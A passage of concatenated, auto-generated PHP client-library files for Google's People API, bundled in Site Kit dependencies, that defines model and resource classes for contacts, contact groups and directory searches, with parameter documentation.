$this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ExternalId::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ExternalId'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ModifyContactGroupMembersResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'notFoundResourceNames'; /** * @var string[] */ public $canNotRemoveLastContactGroupResourceNames; /** * @var string[] */ public $notFoundResourceNames; /** * @param string[] */ public function setCanNotRemoveLastContactGroupResourceNames($canNotRemoveLastContactGroupResourceNames) { $this->canNotRemoveLastContactGroupResourceNames = $canNotRemoveLastContactGroupResourceNames; } /** * @return string[] */ public function getCanNotRemoveLastContactGroupResourceNames() { return $this->canNotRemoveLastContactGroupResourceNames; } /** * @param string[] */ public function setNotFoundResourceNames($notFoundResourceNames) { $this->notFoundResourceNames = $notFoundResourceNames; } /** * @return string[] */ public function getNotFoundResourceNames() { return $this->notFoundResourceNames; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ModifyContactGroupMembersResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ModifyContactGroupMembersResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class SearchResult extends \Google\Site_Kit_Dependencies\Google\Model { protected $personType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $personDataType = ''; /** * @param Person */ public function setPerson(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person $person) { $this->person = $person; } /** * @return Person */ public function getPerson() { return $this->person; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchResult::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_SearchResult'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\ModifyContactGroupMembersRequest; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\ModifyContactGroupMembersResponse; /** * The "members" collection of methods. * Typical usage is: * <code> * $peopleService = new Google\Service\PeopleService(...); * $members = $peopleService->contactGroups_members; * </code> */ class ContactGroupsMembers extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Modify the members of a contact group owned by the authenticated user. The * only system contact groups that can have members added are * `contactGroups/myContacts` and `contactGroups/starred`. Other system contact * groups are deprecated and can only have contacts removed. (members.modify) * * @param string $resourceName Required. The resource name of the contact group * to modify. * @param ModifyContactGroupMembersRequest $postBody * @param array $optParams Optional parameters. * @return ModifyContactGroupMembersResponse * @throws \Google\Service\Exception */ public function modify($resourceName, \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ModifyContactGroupMembersRequest $postBody, $optParams = []) { $params = ['resourceName' => $resourceName, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('modify', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ModifyContactGroupMembersResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\ContactGroupsMembers::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Resource_ContactGroupsMembers'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchCreateContactsRequest; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchCreateContactsResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchDeleteContactsRequest; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchUpdateContactsRequest; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchUpdateContactsResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\DeleteContactPhotoResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\GetPeopleResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListDirectoryPeopleResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\PeopleEmpty; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchDirectoryPeopleResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactPhotoRequest; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactPhotoResponse; /** * The "people" collection of methods. * Typical usage is: * <code> * $peopleService = new Google\Service\PeopleService(...); * $people = $peopleService->people; * </code> */ class People extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Create a batch of new contacts and return the PersonResponses for the newly * Mutate requests for the same user should be sent sequentially to avoid * increased latency and failures. (people.batchCreateContacts) * * @param BatchCreateContactsRequest $postBody * @param array $optParams Optional parameters. * @return BatchCreateContactsResponse * @throws \Google\Service\Exception */ public function batchCreateContacts(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchCreateContactsRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchCreateContacts', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchCreateContactsResponse::class); } /** * Delete a batch of contacts. Any non-contact data will not be deleted. Mutate * requests for the same user should be sent sequentially to avoid increased * latency and failures. (people.batchDeleteContacts) * * @param BatchDeleteContactsRequest $postBody * @param array $optParams Optional parameters. * @return PeopleEmpty * @throws \Google\Service\Exception */ public function batchDeleteContacts(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchDeleteContactsRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchDeleteContacts', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\PeopleEmpty::class); } /** * Update a batch of contacts and return a map of resource names to * PersonResponses for the updated contacts. Mutate requests for the same user * should be sent sequentially to avoid increased latency and failures. * (people.batchUpdateContacts) * * @param BatchUpdateContactsRequest $postBody * @param array $optParams Optional parameters. * @return BatchUpdateContactsResponse * @throws \Google\Service\Exception */ public function batchUpdateContacts(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchUpdateContactsRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchUpdateContacts', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchUpdateContactsResponse::class); } /** * Create a new contact and return the person resource for that contact. The * request returns a 400 error if more than one field is specified on a field * that is a singleton for contact sources: * biographies * birthdays * genders * * names Mutate requests for the same user should be sent sequentially to * avoid increased latency and failures. (people.createContact) * * @param Person $postBody * @param array $optParams Optional parameters. * * @opt_param string personFields Required. A field mask to restrict which * fields on each person are returned. Multiple fields can be specified by * separating them with commas. Defaults to all fields if not set. Valid values * are: * addresses * ageRanges * biographies * birthdays * calendarUrls * * clientData * coverPhotos * emailAddresses * events * externalIds * genders * * imClients * interests * locales * locations * memberships * metadata * * miscKeywords * names * nicknames * occupations * organizations * phoneNumbers * * photos * relations * sipAddresses * skills * urls * userDefined * @opt_param string sources Optional. A mask of what source types to return. * Defaults to READ_SOURCE_TYPE_CONTACT and READ_SOURCE_TYPE_PROFILE if not set. * @return Person * @throws \Google\Service\Exception */ public function createContact(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('createContact', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class); } /** * Delete a contact person. Any non-contact data will not be deleted. Mutate * requests for the same user should be sent sequentially to avoid increased * latency and failures. (people.deleteContact) * * @param string $resourceName Required. The resource name of the contact to * delete. * @param array $optParams Optional parameters. * @return PeopleEmpty * @throws \Google\Service\Exception */ public function deleteContact($resourceName, $optParams = []) { $params = ['resourceName' => $resourceName]; $params = \array_merge($params, $optParams); return $this->call('deleteContact', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\PeopleEmpty::class); } /** * Delete a contact's photo. Mutate requests for the same user should be done * sequentially to avoid // lock contention. (people.deleteContactPhoto) * * @param string $resourceName Required. The resource name of the contact whose * photo will be deleted. * @param array $optParams Optional parameters. * * @opt_param string personFields Optional. A field mask to restrict which * fields on the person are returned. Multiple fields can be specified by * separating them with commas. Defaults to empty if not set, which will skip * the post mutate get. Valid values are: * addresses * ageRanges * biographies * * birthdays * calendarUrls * clientData * coverPhotos * emailAddresses * * events * externalIds * genders * imClients * interests * locales * locations * * memberships * metadata * miscKeywords * names * nicknames * occupations * * organizations * phoneNumbers * photos * relations * sipAddresses * skills * * urls * userDefined * @opt_param string sources Optional. A mask of what source types to return. * Defaults to READ_SOURCE_TYPE_CONTACT and READ_SOURCE_TYPE_PROFILE if not set. * @return DeleteContactPhotoResponse * @throws \Google\Service\Exception */ public function deleteContactPhoto($resourceName, $optParams = []) { $params = ['resourceName' => $resourceName]; $params = \array_merge($params, $optParams); return $this->call('deleteContactPhoto', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\DeleteContactPhotoResponse::class); } /** * Provides information about a person by specifying a resource name. Use * `people/me` to indicate the authenticated user. The request returns a 400 * error if 'personFields' is not specified. (people.get) * * @param string $resourceName Required. The resource name of the person to * provide information about. - To get information about the authenticated user, * specify `people/me`. - To get information about a google account, specify * `people/{account_id}`. - To get information about a contact, specify the * resource name that identifies the contact as returned by * `people.connections.list`. * @param array $optParams Optional parameters. * * @opt_param string personFields Required. A field mask to restrict which * fields on the person are returned. Multiple fields can be specified by * separating them with commas. Valid values are: * addresses * ageRanges * * biographies * birthdays * calendarUrls * clientData * coverPhotos * * emailAddresses * events * externalIds * genders * imClients * interests * * locales * locations * memberships * metadata * miscKeywords * names * * nicknames * occupations * organizations * phoneNumbers * photos * relations * * sipAddresses * skills * urls * userDefined * @opt_param string requestMask.includeField Required. Comma-separated list of * person fields to be included in the response. Each path should start with * `person.`: for example, `person.names` or `person.photos`. * @opt_param string sources Optional. A mask of what source types to return. * Defaults to READ_SOURCE_TYPE_PROFILE and READ_SOURCE_TYPE_CONTACT if not set. * @return Person * @throws \Google\Service\Exception */ public function get($resourceName, $optParams = []) { $params = ['resourceName' => $resourceName]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class); } /** * Provides information about a list of specific people by specifying a list of * requested resource names. Use `people/me` to indicate the authenticated user. * The request returns a 400 error if 'personFields' is not specified. * (people.getBatchGet) * * @param array $optParams Optional parameters. * * @opt_param string personFields Required. A field mask to restrict which * fields on each person are returned. Multiple fields can be specified by * separating them with commas. Valid values are: * addresses * ageRanges * * biographies * birthdays * calendarUrls * clientData * coverPhotos * * emailAddresses * events * externalIds * genders * imClients * interests * * locales * locations * memberships * metadata * miscKeywords * names * * nicknames * occupations * organizations * phoneNumbers * photos * relations * * sipAddresses * skills * urls * userDefined * @opt_param string requestMask.includeField Required. Comma-separated list of * person fields to be included in the response. Each path should start with * `person.`: for example, `person.names` or `person.photos`. * @opt_param string resourceNames Required. The resource names of the people to * provide information about. It's repeatable. The URL query parameter should be * resourceNames=&resourceNames=&... - To get information about the * authenticated user, specify `people/me`. - To get information about a google * account, specify `people/{account_id}`. - To get information about a contact, * specify the resource name that identifies the contact as returned by * `people.connections.list`. There is a maximum of 200 resource names. * @opt_param string sources Optional. A mask of what source types to return. * Defaults to READ_SOURCE_TYPE_CONTACT and READ_SOURCE_TYPE_PROFILE if not set. * @return GetPeopleResponse * @throws \Google\Service\Exception */ public function getBatchGet($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('getBatchGet', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\GetPeopleResponse::class); } /** * Provides a list of domain profiles and domain contacts in the authenticated * user's domain directory. When the `sync_token` is specified, resources * deleted since the last sync will be returned as a person with * `PersonMetadata.deleted` set to true. When the `page_token` or `sync_token` * is specified, all other request parameters must match the first call. Writes * may have a propagation delay of several minutes for sync requests. * Incremental syncs are not intended for read-after-write use cases. See * example usage at [List the directory people that have * changed](/people/v1/directory#list_the_directory_people_that_have_changed). * (people.listDirectoryPeople) * * @param array $optParams Optional parameters. * * @opt_param string mergeSources Optional. Additional data to merge into the * directory sources if they are connected through verified join keys such as * email addresses or phone numbers. * @opt_param int pageSize Optional. The number of people to include in the * response. Valid values are between 1 and 1000, inclusive. Defaults to 100 if * not set or set to 0. * @opt_param string pageToken Optional. A page token, received from a previous * response `next_page_token`. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to * `people.listDirectoryPeople` must match the first call that provided the page * token. * @opt_param string readMask Required. A field mask to restrict which fields on * each person are returned. Multiple fields can be specified by separating them * with commas. Valid values are: * addresses * ageRanges * biographies * * birthdays * calendarUrls * clientData * coverPhotos * emailAddresses * events * * externalIds * genders * imClients * interests * locales * locations * * memberships * metadata * miscKeywords * names * nicknames * occupations * * organizations * phoneNumbers * photos * relations * sipAddresses * skills * * urls * userDefined * @opt_param bool requestSyncToken Optional. Whether the response should return * `next_sync_token`. It can be used to get incremental changes since the last * request by setting it on the request `sync_token`. More details about sync * behavior at `people.listDirectoryPeople`. * @opt_param string sources Required. Directory sources to return. * @opt_param string syncToken Optional. A sync token, received from a previous * response `next_sync_token` Provide this to retrieve only the resources * changed since the last request. When syncing, all other parameters provided * to `people.listDirectoryPeople` must match the first call that provided the * sync token. More details about sync behavior at `people.listDirectoryPeople`. * @return ListDirectoryPeopleResponse * @throws \Google\Service\Exception */ public function listDirectoryPeople($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('listDirectoryPeople', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListDirectoryPeopleResponse::class); } /** * Provides a list of contacts in the authenticated user's grouped contacts that * matches the search query. The query matches on a contact's `names`, * `nickNames`, `emailAddresses`, `phoneNumbers`, and `organizations` fields * that are from the CONTACT source. **IMPORTANT**: Before searching, clients * should send a warmup request with an empty query to update the cache. See * https://developers.google.com/people/v1/contacts#search_the_users_contacts * (people.searchContacts) * * @param array $optParams Optional parameters. * * @opt_param int pageSize Optional. The number of results to return. Defaults * to 10 if field is not set, or set to 0. Values greater than 30 will be capped * to 30. * @opt_param string query Required. The plain-text query for the request. The * query is used to match prefix phrases of the fields on a person. For example, * a person with name "foo name" matches queries such as "f", "fo", "foo", "foo * n", "nam", etc., but not "oo n". * @opt_param string readMask Required. A field mask to restrict which fields on * each person are returned. Multiple fields can be specified by separating them * with commas. Valid values are: * addresses * ageRanges * biographies * * birthdays * calendarUrls * clientData * coverPhotos * emailAddresses * events * * externalIds * genders * imClients * interests * locales * locations * * memberships * metadata * miscKeywords * names * nicknames * occupations * * organizations * phoneNumbers * photos * relations * sipAddresses * skills * * urls * userDefined * @opt_param string sources Optional. A mask of what source types to return. * Defaults to READ_SOURCE_TYPE_CONTACT if not set. * @return SearchResponse * @throws \Google\Service\Exception */ public function searchContacts($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('searchContacts', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchResponse::class); } /** * Provides a list of domain profiles and domain contacts in the authenticated * user's domain directory that match the search query. * (people.searchDirectoryPeople) * * @param array $optParams Optional parameters. * * @opt_param string mergeSources Optional. Additional data to merge into the * directory sources if they are connected through verified join keys such as * email addresses or phone numbers. * @opt_param int pageSize Optional. The number of people to include in the * response. Valid values are between 1 and 500, inclusive. Defaults to 100 if * not set or set to 0. * @opt_param string pageToken Optional. A page token, received from a previous * response `next_page_token`. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `SearchDirectoryPeople` * must match the first call that provided the page token. * @opt_param string query Required. Prefix query that matches fields in the * person. Does NOT use the read_mask for determining what fields to match. * @opt_param string readMask Required. A field mask to restrict which fields on * each person are returned. Multiple fields can be specified by separating them * with commas. Valid values are: * addresses * ageRanges * biographies * * birthdays * calendarUrls * clientData * coverPhotos * emailAddresses * events * * externalIds * genders * imClients * interests * locales * locations * * memberships * metadata * miscKeywords * names * nicknames * occupations * * organizations * phoneNumbers * photos * relations * sipAddresses * skills * * urls * userDefined * @opt_param string sources Required. Directory sources to return. * @return SearchDirectoryPeopleResponse * @throws \Google\Service\Exception */ public function searchDirectoryPeople($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('searchDirectoryPeople', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchDirectoryPeopleResponse::class); } /** * Update contact data for an existing contact person. Any non-contact data will * not be modified. Any non-contact data in the person to update will be * ignored. All fields specified in the `update_mask` will be replaced. The * server returns a 400 error if `person.metadata.sources` is not specified for * the contact to be updated or if there is no contact source. The server * returns a 400 error with reason `"failedPrecondition"` if * `person.metadata.sources.etag` is different than the contact's etag, which * indicates the contact has changed since its data was read. Clients should get * the latest person and merge their updates into the latest person. The server * returns a 400 error if `memberships` are being updated and there are no * contact group memberships specified on the person. The server returns a 400 * error if more than one field is specified on a field that is a singleton for * contact sources: * biographies * birthdays * genders * names Mutate requests * for the same user should be sent sequentially to avoid increased latency and * failures. (people.updateContact) * * @param string $resourceName The resource name for the person, assigned by the * server. An ASCII string in the form of `people/{person_id}`. * @param Person $postBody * @param array $optParams Optional parameters. * * @opt_param string personFields Optional. A field mask to restrict which * fields on each person are returned. Multiple fields can be specified by * separating them with commas. Defaults to all fields if not set. Valid values * are: * addresses * ageRanges * biographies * birthdays * calendarUrls * * clientData * coverPhotos * emailAddresses * events * externalIds * genders * * imClients * interests * locales * locations * memberships * metadata * * miscKeywords * names * nicknames * occupations * organizations * phoneNumbers * * photos * relations * sipAddresses * skills * urls * userDefined * @opt_param string sources Optional. A mask of what source types to return. * Defaults to READ_SOURCE_TYPE_CONTACT and READ_SOURCE_TYPE_PROFILE if not set. * @opt_param string updatePersonFields Required. A field mask to restrict which * fields on the person are updated. Multiple fields can be specified by * separating them with commas. All updated fields will be replaced. Valid * values are: * addresses * biographies * birthdays * calendarUrls * clientData * * emailAddresses * events * externalIds * genders * imClients * interests * * locales * locations * memberships * miscKeywords * names * nicknames * * occupations * organizations * phoneNumbers * relations * sipAddresses * urls * * userDefined * @return Person * @throws \Google\Service\Exception */ public function updateContact($resourceName, \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person $postBody, $optParams = []) { $params = ['resourceName' => $resourceName, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('updateContact', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class); } /** * Update a contact's photo. Mutate requests for the same user should be sent * sequentially to avoid increased latency and failures. * (people.updateContactPhoto) * * @param string $resourceName Required. Person resource name * @param UpdateContactPhotoRequest $postBody * @param array $optParams Optional parameters. * @return UpdateContactPhotoResponse * @throws \Google\Service\Exception */ public function updateContactPhoto($resourceName, \Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactPhotoRequest $postBody, $optParams = []) { $params = ['resourceName' => $resourceName, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('updateContactPhoto', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactPhotoResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\People::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Resource_People'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListConnectionsResponse; /** * The "connections" collection of methods. * Typical usage is: * <code> * $peopleService = new Google\Service\PeopleService(...); * $connections = $peopleService->people_connections; * </code> */ class PeopleConnections extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Provides a list of the authenticated user's contacts. Sync tokens expire 7 * days after the full sync. A request with an expired sync token will get an * error with an [google.rpc.ErrorInfo](https://cloud.google.com/apis/design/err * ors#error_info) with reason "EXPIRED_SYNC_TOKEN". In the case of such an * error clients should make a full sync request without a `sync_token`. The * first page of a full sync request has an additional quota. If the quota is * exceeded, a 429 error will be returned. This quota is fixed and can not be * increased. When the `sync_token` is specified, resources deleted since the * last sync will be returned as a person with `PersonMetadata.deleted` set to * true. When the `page_token` or `sync_token` is specified, all other request * parameters must match the first call. Writes may have a propagation delay of * several minutes for sync requests. Incremental syncs are not intended for * read-after-write use cases. See example usage at [List the user's contacts * that have * changed](/people/v1/contacts#list_the_users_contacts_that_have_changed). * (connections.listPeopleConnections) * * @param string $resourceName Required. The resource name to return connections * for. Only `people/me` is valid. * @param array $optParams Optional parameters. * * @opt_param int pageSize Optional. The number of connections to include in the * response. Valid values are between 1 and 1000, inclusive. Defaults to 100 if * not set or set to 0. * @opt_param string pageToken Optional. A page token, received from a previous * response `next_page_token`. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `people.connections.list` * must match the first call that provided the page token. * @opt_param string personFields Required. A field mask to restrict which * fields on each person are returned. Multiple fields can be specified by * separating them with commas. Valid values are: * addresses * ageRanges * * biographies * birthdays * calendarUrls * clientData * coverPhotos * * emailAddresses * events * externalIds * genders * imClients * interests * * locales * locations * memberships * metadata * miscKeywords * names * * nicknames * occupations * organizations * phoneNumbers * photos * relations * * sipAddresses * skills * urls * userDefined * @opt_param string requestMask.includeField Required. Comma-separated list of * person fields to be included in the response. Each path should start with * `person.`: for example, `person.names` or `person.photos`. * @opt_param bool requestSyncToken Optional. Whether the response should return * `next_sync_token` on the last page of results. It can be used to get * incremental changes since the last request by setting it on the request * `sync_token`. More details about sync behavior at `people.connections.list`. * @opt_param string sortOrder Optional. The order in which the connections * should be sorted. Defaults to `LAST_MODIFIED_ASCENDING`. * @opt_param string sources Optional. A mask of what source types to return. * Defaults to READ_SOURCE_TYPE_CONTACT and READ_SOURCE_TYPE_PROFILE if not set. * @opt_param string syncToken Optional. A sync token, received from a previous * response `next_sync_token` Provide this to retrieve only the resources * changed since the last request. When syncing, all other parameters provided * to `people.connections.list` must match the first call that provided the sync * token. More details about sync behavior at `people.connections.list`. * @return ListConnectionsResponse * @throws \Google\Service\Exception */ public function listPeopleConnections($resourceName, $optParams = []) { $params = ['resourceName' => $resourceName]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListConnectionsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\PeopleConnections::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Resource_PeopleConnections'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\CopyOtherContactToMyContactsGroupRequest; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListOtherContactsResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchResponse; /** * The "otherContacts" collection of methods. * Typical usage is: * <code> * $peopleService = new Google\Service\PeopleService(...); * $otherContacts = $peopleService->otherContacts; * </code> */ class OtherContacts extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Copies an "Other contact" to a new contact in the user's "myContacts" group * Mutate requests for the same user should be sent sequentially to avoid * increased latency and failures. * (otherContacts.copyOtherContactToMyContactsGroup) * * @param string $resourceName Required. The resource name of the "Other * contact" to copy. * @param CopyOtherContactToMyContactsGroupRequest $postBody * @param array $optParams Optional parameters. * @return Person * @throws \Google\Service\Exception */ public function copyOtherContactToMyContactsGroup($resourceName, \Google\Site_Kit_Dependencies\Google\Service\PeopleService\CopyOtherContactToMyContactsGroupRequest $postBody, $optParams = []) { $params = ['resourceName' => $resourceName, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('copyOtherContactToMyContactsGroup', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class); } /** * List all "Other contacts", that is contacts that are not in a contact group. * "Other contacts" are typically auto created contacts from interactions. Sync * tokens expire 7 days after the full sync. A request with an expired sync * token will get an error with an [google.rpc.ErrorInfo](https://cloud.google.c * om/apis/design/errors#error_info) with reason "EXPIRED_SYNC_TOKEN". In the * case of such an error clients should make a full sync request without a * `sync_token`. The first page of a full sync request has an additional quota. * If the quota is exceeded, a 429 error will be returned. This quota is fixed * and can not be increased. When the `sync_token` is specified, resources * deleted since the last sync will be returned as a person with * `PersonMetadata.deleted` set to true. When the `page_token` or `sync_token` * is specified, all other request parameters must match the first call. Writes * may have a propagation delay of several minutes for sync requests. * Incremental syncs are not intended for read-after-write use cases. See * example usage at [List the user's other contacts that have * changed](/people/v1/other- * contacts#list_the_users_other_contacts_that_have_changed). * (otherContacts.listOtherContacts) * * @param array $optParams Optional parameters. * * @opt_param int pageSize Optional. The number of "Other contacts" to include * in the response. Valid values are between 1 and 1000, inclusive. Defaults to * 100 if not set or set to 0. * @opt_param string pageToken Optional. A page token, received from a previous * response `next_page_token`. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `otherContacts.list` must * match the first call that provided the page token. * @opt_param string readMask Required. A field mask to restrict which fields on * each person are returned. Multiple fields can be specified by separating them * with commas. What values are valid depend on what ReadSourceType is used. If * READ_SOURCE_TYPE_CONTACT is used, valid values are: * emailAddresses * * metadata * names * phoneNumbers * photos If READ_SOURCE_TYPE_PROFILE is used, * valid values are: * addresses * ageRanges * biographies * birthdays * * calendarUrls * clientData * coverPhotos * emailAddresses * events * * externalIds * genders * imClients * interests * locales * locations * * memberships * metadata * miscKeywords * names * nicknames * occupations * * organizations * phoneNumbers * photos * relations * sipAddresses * skills * * urls * userDefined * @opt_param bool requestSyncToken Optional. Whether the response should return * `next_sync_token` on the last page of results. It can be used to get * incremental changes since the last request by setting it on the request * `sync_token`. More details about sync behavior at `otherContacts.list`. * @opt_param string sources Optional. A mask of what source types to return. * Defaults to READ_SOURCE_TYPE_CONTACT if not set. Possible values for this * field are: * READ_SOURCE_TYPE_CONTACT * * READ_SOURCE_TYPE_CONTACT,READ_SOURCE_TYPE_PROFILE Specifying * READ_SOURCE_TYPE_PROFILE without specifying READ_SOURCE_TYPE_CONTACT is not * permitted. * @opt_param string syncToken Optional. A sync token, received from a previous * response `next_sync_token` Provide this to retrieve only the resources * changed since the last request. When syncing, all other parameters provided * to `otherContacts.list` must match the first call that provided the sync * token. More details about sync behavior at `otherContacts.list`. * @return ListOtherContactsResponse * @throws \Google\Service\Exception */ public function listOtherContacts($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListOtherContactsResponse::class); } /** * Provides a list of contacts in the authenticated user's other contacts that * matches the search query. The query matches on a contact's `names`, * `emailAddresses`, and `phoneNumbers` fields that are from the OTHER_CONTACT * source. **IMPORTANT**: Before searching, clients should send a warmup request * with an empty query to update the cache. See * https://developers.google.com/people/v1/other- * contacts#search_the_users_other_contacts (otherContacts.search) * * @param array $optParams Optional parameters. * * @opt_param int pageSize Optional. The number of results to return. Defaults * to 10 if field is not set, or set to 0. 